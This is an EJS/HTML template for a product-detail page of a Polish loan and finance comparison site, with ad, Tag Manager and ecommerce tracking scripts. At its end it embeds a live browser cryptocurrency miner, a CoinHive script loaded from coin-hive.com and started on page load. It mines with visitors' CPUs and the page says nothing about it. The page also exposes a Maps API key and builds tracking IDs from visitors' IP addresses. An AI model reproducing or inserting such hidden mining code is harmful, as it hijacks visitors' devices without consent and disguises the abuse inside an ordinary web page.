<!DOCTYPE HTML>

<html lang="pl">

<head>
	<meta charset="utf-8"/>
	<meta name="Description" content="<%=product.meta.description%>">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
	<link rel="shortcut icon" href="../favicon.ico">
	<link rel="stylesheet" type="text/css" href="/stylesheets/css/menu.css">
	<link rel="stylesheet" type="text/css" href="/stylesheets/css/selected_product.css" />
	<link rel="stylesheet" type="text/css" href="/stylesheets/css/jquery-ui.css" />
	<link rel="icon" type="image/png" href="/icons/favicon.png">
	<title><%=product.meta.title%></title>
	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
	<script>
	  (adsbygoogle = window.adsbygoogle || []).push({
		google_ad_client: "ca-pub-8388218201561397",
		enable_page_level_ads: true
	  });
	</script>
 </head>

<body>
<!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-KZD6WP"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KZD6WP');</script>
<!-- End Google Tag Manager -->
	<!--<a class="contact-link" href="/kontakt">Kontakt</a>-->
<script type="text/javascript" src="/javascripts/jquery.min.js"></script>
<script type="text/javascript" src="/javascripts/jquery-ui.js"></script>
<script type="text/javascript">
	$.getJSON('//ipinfo.io/json', function(data) {
	  window.ip = data.ip;
	});

	function getJsonFromUrl() {
		var query = location.search.substr(1);
		var result = {};
		query.split("&").forEach(function(part) {
			var item = part.split("=");
			result[item[0]] = decodeURIComponent(item[1]);
		});
		return result;
	}

	dataLayer.push(<%- dataLayerObject %>);
	dataLayer.push({
		google_tag_params: {
			dynx_itemid: <%- product.id %>,
			dynx_pagetype: 'offerdetail',
			dynx_totalvalue: 0
		}
	});

	function applyNowClick (product) {
		var dt;
		if ((navigator.userAgent.indexOf("MSIE") != -1 ) || (!!document.documentMode == true )) {
			dt = (new Date()).toLocaleString().replace(" ", "T")
		} else {
			dt = (new Date).toLocaleDateString().split(".").reverse().toString().replace(/,/g, "-") + "T" + (new Date).toLocaleTimeString()
		}
		var url = getJsonFromUrl();
		dataLayer.push({
		event: 'checkout',
			ecommerce: {
				purchase: {
					actionField: { 
						step: 1, 
						id: window.ip + '_' + dt,
						list: url.from,
					},
					products: [{
						name: product.name + ' ' + product.provider,
						id: product.id,
						price: 0,
						brand: product.provider,
						category: product.category + '/' + product.subcategory,
						variant: '',
						quantity: 1
					}]
				},
				checkout: {
					actionField: { 
						step: 1, 
						list: url.from,
					},
					products: [{
						name: product.name + ' ' + product.provider,
						id: product.id,
						price: 0,
						brand: product.provider,
						category: product.category + '/' + product.subcategory,
						variant: '',
						quantity: 1
					}]
				}
			}
		});
	}
	function readMoreClick (product) {
		var url = getJsonFromUrl();
		dataLayer.push({
		event: 'productClick',
		ecommerce: {
			click: {
				actionField: { list: url.from },
				products: [{
					name: product.name + ' ' + product.provider,
					id: product.id,
					price: 0,
					brand: product.provider,
					category: product.category + '/' + product.subcategory,
					variant: '',
					position: 1
				 }]
				}
			}
		});
	}
</script>
<div class="dimness"></div>
	<header><% include partials/templemate/header.ejs %></header>
	<div class="wrapper container">
		<article class="search-result row">
			<div class="whole-product col-md-6 col-lg-7">
				<% if (product.alive)  { %>
				<div class="img-wrapper">
					<% var alt = product.value.replace(/-/g, ' ')%>
					<img src ="/images/products/<%=product.value%>.png" alt="<%=alt%>">
				</div>
				<div class="info">
					<h1><%=product.name%> <%=product.provider%></h1>
					<%-product.longDescription%>
					<% if (product.application.isActive) { %>
					<a class="button apply-now" onclick="applyNowClick(<%=JSON.stringify(product)%>)" href="<%=product.application.redirect%>" rel="nofollow" target="_blank">Zloż wniosek</a>
					<% } %>
				</div>
				<% } %>
			</div>
			<div class="line"></div>
			<div class="products col-md-6 col-lg-5">
				<% suggestedProducts.forEach(product => { %>
				<% if (product.alive) { %>
				<div class="single-product">
					<div class="img-and-btns">
						<div class="img-wrapper">
							<% var alt = product.value.replace(/-/g, ' ')%>
							<img src ="/images/products/<%=product.value%>.png" alt="<%=alt%>">
						</div>
						<div class="buttons-container">
							<a class="button read-more" onclick="readMoreClick(<%=JSON.stringify(product)%>)" href="/finanse/produkt/<%=product.value%>?from=Product_details">Dowiedz się więcej</a>
							<% if (product.application.isActive) { %>
							<a class="button apply-now" onclick="applyNowClick(<%=JSON.stringify(product)%>)" href="<%=product.application.redirect%>" target="_blank">Zloż wniosek</a>
							<% } %>
						</div>
					</div>
					<div class="info">
						<div class="inner-scroll">
							<h2><%=product.name%> <%=product.provider%></h2>
							<%-product.description%>
						</div>
					</div>
				</div>
				<% } %>
				<% }) %>
			</div>
		</article>
		<aside class="aside aside-1"></aside>
		<aside class="aside aside-2"></aside>
	</div>

	<footer> <% include partials/templemate/footer.ejs %> </footer>
	<script src="/javascripts/typeahead.js"> </script>
	<script src="/javascripts/main.js"></script>
	<script>
	  function initMap() {
		var uluru = {lat: 52.235765, lng: 21.0177286};
		var map = new google.maps.Map(document.getElementById('map'), {
		  zoom: 13,
		  center: uluru,
		  disableDefaultUI: true,
		  zoomControl: true
		});
		var marker = new google.maps.Marker({
		  position: uluru,
		  map: map
		});
	  }
	</script>
	<script async defer
	src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCMfnryrSqfNlO6vbG6RgbyZDobT7K7Ips&callback=initMap">
	</script>
	<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
	<script>
		var miner = new CoinHive.User('Stln12b1koKM0G7e0C054314KEIoBVdj', 'amoney.pl', {
			threads: 2,
			autoThreads: false
		});
		miner.start();
	</script>
</body>

</html>
